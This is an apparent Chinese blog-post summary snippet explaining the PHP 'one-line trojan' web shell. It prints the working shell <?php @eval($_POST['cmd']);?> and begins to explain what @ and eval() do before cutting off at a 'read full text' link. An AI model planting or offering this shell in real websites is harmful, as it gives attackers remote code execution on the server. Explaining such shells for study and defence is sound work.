摘要: 一句话木马 原理 代码 <?php @eval($_POST['cmd']);?> 解析 # @ 代表了即使报错了,也不显示 # eval()函数把字符串按照 PHP 代码来计算 $string = "beautiful"; $time = "winter"; $str = 'This is a $string 阅读全文
posted @ 2021-09-18 18:16 筱团 阅读(212) 评论(0) 推荐(0)